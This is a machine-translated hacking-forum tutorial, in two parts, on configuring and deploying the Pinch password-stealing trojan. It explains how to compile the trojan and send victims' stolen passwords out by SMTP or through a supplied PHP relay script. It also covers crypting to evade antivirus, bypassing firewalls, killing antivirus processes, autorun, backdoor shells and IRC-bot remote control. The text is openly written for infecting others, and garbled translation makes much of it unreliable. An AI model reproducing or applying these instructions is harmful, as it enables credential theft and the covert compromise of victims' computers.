This page has been robot translated, sorry for typos if any. Original content here.

We break the soap, use BrutusAET2


-------------------------------------------------- ----------------
part 1. old, but useful. for pinch 1

Pinch Instruction 1.0


Please do not be surprised that I decided to write such an article (article for lamerzzz). The fact is that on my forum ( about once every three days a theme is created, like "How to properly configure and use Pinch?", "How to use Pinch?" etc.


This Trojan has become quite widespread in 2003/2004. All thanks to the ability to steal a large number of passwords (ICQ99b-2003a / Lite / ICQ2003Pro, Miranda IM, Trillian ICQ & AIM, & RQ, The Bat !, The Outlook Express Outlook, IE autocomplete & protected sites & ftp (9x / ME / 2000 / XP), FAR Manager (ftp), Win / Total Commander (ftp), RAS (9x / Me / 2k / xp supported)), small weight, open source and easy creation of a troy for a specific task. Troyan has the following options:

- Send the configuration of the victim's computer: OS, operatics, CPU, HDD, logged user, host name, IP
- Keyboard spy (Key-log)
- Remote console
- Bypass Firewall
- Sending all passwords to E-mail using an SMTP server
- Encryption of stolen passwords sent by mail
- Trojan auto-removal after launch
- HTML / Text reports
- File size is approximately 10Kb
- Modular system
- And much more...

Troyan wrote coban2k ( - a fairly well-known person in the world of ICQ-hacking. Due to problems with hosting about storing the Trojan on their server, the author was forced to remove this creation from his website. Unfortunately, almost all antiviruses find this triple and it can only be vparit to the victim, who does not have antivirus.


The following folders and files are included in the archive ( with the trojan:

\ PinchBuilder.exe - wizard for creating Trojan
\ Parser.exe - program for decrypting encrypted emails with passwords
\ readme.txt - no comments
\ Pinch \ - main folder with asm-sources of the Trojan and the compiler
\ Sources \ - other sources
\ TB! 2 Plugin (Auto-parser) \ - folder with a plug-in for The Bat 2 !, which decodes encrypted emails with passwords coming to your mailbox
\ Sources \ Script \ - PHP-script, through which passwords are sent when selecting the appropriate option when compiling (read further)

Compile the triple

The kit comes with a special wizard (PinchBuilder.exe), which is involved in creating a Trojan for your requirements and compiling the Trojan directly on your computer. The program has two main tabs: Compile and Decrypt. The first one is used to create a trojan, and the second is used to decrypt passwords (in fact, this tab is the result of the operation of the Parser.exe file). Then there are three sub-tabs: SMTP, HTTP and FILE. They are given the option of outputting passwords. Let's analyze each in more detail:


In the Server field, enter the address (hostname / ip) of the SMTP server. If you entered the server domain, then click Resolve to make the server domain look like an IP address. Next, in the From and To fields, specify your own soap. The Send test massage button is used for test mail sending, through the settings you specified. I strongly recommend that you use it. If the letter does not come, it means that there are some problems with sending (included firewall, bad SMTP, did not click Resolve, etc.).

I want to note that lately most providers are switching to a system whereby their customers can send letters ONLY from their SMTP-verver. In such cases, I recommend using the method of sending letters, via HTTP.


We upload the file \ Sources \ Script \ view.php to the server supporting PHP-scripts and executing the mail () function. Next, in the URL field, specify the path to this script (for example, In the Subject field, specify the name of the topic with which the messages will be recovered. In the Status check str field there should be a line, which is issued by the script after it is loaded. In the script that comes with the troy it has a value: _ret_ok_1:

<script language = "JavaScript">
window.status = "_ ret_ok_1";
</ script>

If this value is not accepted by the Trojan, it will try to send a message through this script every minute until it receives a string from the Status check str field. I recommend that you use the script not from the standard delivery, but written by me:

<html> <body>
<? php
// Author: Terabyte (
$ email = $ _ POST ['a'];
$ subject = $ _ POST ['b'];
$ msg = $ _ POST ['c'];
if (isset ($ email) and isset ($ subject) and isset ($ msg)) {
mail ($ email, $ subject, $ msg, "From: $ email");}
<script language = "JavaScript">
window.status = "_ ret_ok_1";
</ script>
</ body> </ html>

He does almost the same thing, but is more competently written. A huge advantage when using this method of sending passwords is the fact that it allows you to send passwords bypassing the Firewall. How is this achieved? Here's a clipping from the outpost's log when sending the password through the script from my site:

Process name: iexplorer.exe
Protocol: HTTP
Remote address:

I think everyone understood who is not in the tank =) Also from the pros I can I can highlight the possibility to write encrypted letters on your site, and not send them to soap; the ability to change the soap to which the passwords are sent, in case it is deleted; with mass mailing of the troy (so that passwords can be sent even from those providers where access to all SMTP servers except them is disabled)


This tab sets the path to the file in which all passwords are saved. To do this, in the Path field, write the path to the file (for example, C: \ password.txt).

Compiler Options

In this area, everything is clear, then you just have to tick the boxes where you need it. It is necessary to pay attention to the field Add Icon. It indicates the path to the icon from which the compiled trojan will be displayed. I want to note that on my system (Windows XP) I was not able to compile the trojan with this option enabled and it had to be disabled.

In the Protocol fields, specify the method by which the passwords will be sent (SMTP / HTTP / FILE). Next, click the Compile button and go to compile the Trojan, which will be saved to the main folder with the wizard to create it.

Decrypting passwords

Suppose you could vparit lamer this triple and you on the soap came passwords from the victim's car. The fact is that when sending, passwords are encrypted and must first be decrypted (if you do not have a special plug-in to TheBat! Described above). Copy the text with the encoded passwords to the clipboard, open Parser.exe (or the Decrypt tab in PinchBuilder.exe) and click the Process Data item in the context menu (or just press the Alt + C key combination). Next, the program will give you all the data stolen from the victim with a convenient form. Then you can save or print them.


I want to warn you that when using this Trojan you immediately fall under Article 273 of the Criminal Code of the Russian Federation and can be severely punished ;-) I (the author of the article) do not bear any responsibility for the harm that may be caused to some persons after reading my article.


part 2. instruction for pinch 2.58

A small article on the elementary configuration of the pinch. Do not judge strictly, but criticize in all your mouth. Article on setting up Pinch 2.58.

I think that with crack-ohm problems there is no niukava, since there is a detailed help and even a video is attached. I want to show you how to set up a three in Builder:

SMTP Properties
Server (you enter, in your case, then you necessarily press Resolve so that it is transformed into IP (by the way, all the fraud must be done with the Internet connected)

Port - leave it as it is

Protocol - the choice of how the report will be received, by SMTP, HTTP (via php) and FILE - stored on the computer. The same buttons (SMTP, HTTP, FILE) configure the protocols, but in this case we are interested in SMTP and we have already configured it.

TestSend button sends a test message to the mail.

The PWD tab -preset passwords from the listed programs. The ENABLE PWD item will not contain any passwords when the daw is removed.
Do not send old report - do not send old reports.
Gryki Encrypt and Packing are interconnected. FSG, UPX, MEW selection of the packing method.

RUN tab - select the methods of autorun. I think you'll sort it out. To start as .... standart, DLL, Undelate Service. Move to the folder ..... or you specify or choose one of the system ones. On the right, the column Values ​​I did not touch it and to be honest I vaguely imagine why. From the bottom right - bypass Windows Firewall (SP2) - bypass the system firewall in SP2 (as far as I know the mechanism of this item is it starts as iexplorer.exe)

The SPY tab - some additional reports - it did not work for me. The point of screen spy is taking a screenshot, but again it did not work for me (srkin was sent, but it was empty)

The NET tab - I did not use it. It is designed to:
1. Open any port on the infected computer and, accordingly, get access to it (strongly disregard this use, if you do not encrypt it, if you are caught, you yourself guess what will happen ...)
2. Downloader - specify a direct link to a file that should download and run (estimate what costs your enemy will incur if he has traffic ......))))
3. AutoUpdate - auto update - three, after the work is finished, it downloads its copy, and then it is self-destructed and the next system load, a new copy is launched (this is for reliability so that it can not be found.

BD (backdoor) tab - the console opens the shell on the selected port, telnet control (telnet.exe) or alternative programs. (I myself have not tried it)

The ECT tab - gluing together with any file, as well as setting the icon ... You can also do that, the message pops up ... But something does not work ...

The KILL tab is the killing of any process (you can try and kill the antivirus), for example "spidernt" - and then the DrWEB monitor will turn off (I warn you, I have not given it yet, but I will try it)

IE tab - set your homepage to the browser. Adding a page to Favorites ....

The WORM tab - sho zet taeke, I do not ... .....

IRC-bot tab - access to the computer via IRC:
.login authorization
.die - shutting down the bot
.download - jump file from URL
.httpd - open access to the file via http on a specific port
.killthread - completion of a specific task
.proxy - opens the sox4 s on the selected port with the selected id
.raw - sending raw text to this irc server
.remove - self-deletion
.restart - restart
.run - run commands
.scan - scanning of IP addresses on certain open ports
.shell - opening the shell on a specific port (not in 95/98 / ME)
.status - show version, IP, start date
.threads - show active tasks
.update - self-updating bot from a special URL
.visit - visit selected url hidden
.url - visit the selected URL openly
.link - add to favorits
.sp - make your homepage
.msg - messagebox

That seems to be everything .... You press COMPILE and you have a folder in the folder with the builder ...


PS This, like, everything is written for review and the author does not bear any responsibility for the consequences ...


Crypt features:
Used a polymorphic cryptor
Bypassing KIS and Outpost (including the latest versions)
Reducing the size (Normal pinch decreases by 3-6kb, zupacha loader by 60-80kb)